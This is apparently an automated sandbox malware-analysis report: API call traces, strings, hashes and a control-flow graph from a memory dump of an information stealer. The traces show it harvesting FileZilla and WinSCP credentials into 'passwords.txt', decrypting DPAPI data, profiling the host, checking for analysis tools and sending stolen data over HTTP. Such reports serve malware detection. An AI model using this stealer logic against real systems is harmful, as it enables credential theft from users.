                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                            • String ID: /
                                                                                                                            • API String ID: 507856799-4001269591
                                                                                                                            • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                            • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                                            • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                            • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1799959500-0
                                                                                                                            • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                            • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                                            • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                            • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                                            APIs
                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                            • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                            • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                            • String ID: DPAPI
                                                                                                                            • API String ID: 2068576380-1690256801
                                                                                                                            • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                            • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                                                            • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                            • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 907984538-0
                                                                                                                            • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                            • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                                            • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                            • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                            • wsprintfA.USER32 ref: 00410D7D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 362916592-0
                                                                                                                            • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                            • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                                                                            • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                            • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                            • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocNameProcessUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1206570057-0
                                                                                                                            • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                            • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                                                            • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                            • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystemwsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2452939696-0
                                                                                                                            APIs
                                                                                                                            • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1586166983-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                              • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                              • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                              • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                                            • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                            • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,433cd71b7a2bdd3668a493b00ee95630,",build_id,00437814,------), ref: 00405C67
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                            • _memmove.LIBCMT ref: 00405CB4
                                                                                                                            • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                            • _memmove.LIBCMT ref: 00405CD6
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                            • _memmove.LIBCMT ref: 00405D05
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                            • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                            • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                            • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                            • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                            • String ID: ------$"$"$"$"$--$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$ERROR$ERROR$block$build_id$file_data
                                                                                                                            • API String ID: 2638065154-1387777635

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                              • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                            • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                            • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040E1B7
                                                                                                                            • _memset.LIBCMT ref: 0040E1D7
                                                                                                                            • _memset.LIBCMT ref: 0040E1E8
                                                                                                                            • _memset.LIBCMT ref: 0040E1F9
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                            • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                            • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                            • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                            • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                            • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,433cd71b7a2bdd3668a493b00ee95630,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                            • _memmove.LIBCMT ref: 00406639
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                            • _memmove.LIBCMT ref: 00406662
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                            • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                            • String ID: "$"$"$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$build_id$mode

                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                            • GetProcAddress.KERNEL32(76850000,004184C2), ref: 004188AA
                                                                                                                            • GetProcAddress.KERNEL32(77040000,004184C2), ref: 004188C5
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                            • GetProcAddress.KERNEL32(75A10000,004184C2), ref: 004188F7
                                                                                                                            • GetProcAddress.KERNEL32(75690000,004184C2), ref: 00418912
                                                                                                                            • GetProcAddress.KERNEL32(776F0000,004184C2), ref: 0041892D
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2238633743-0

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 930 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 
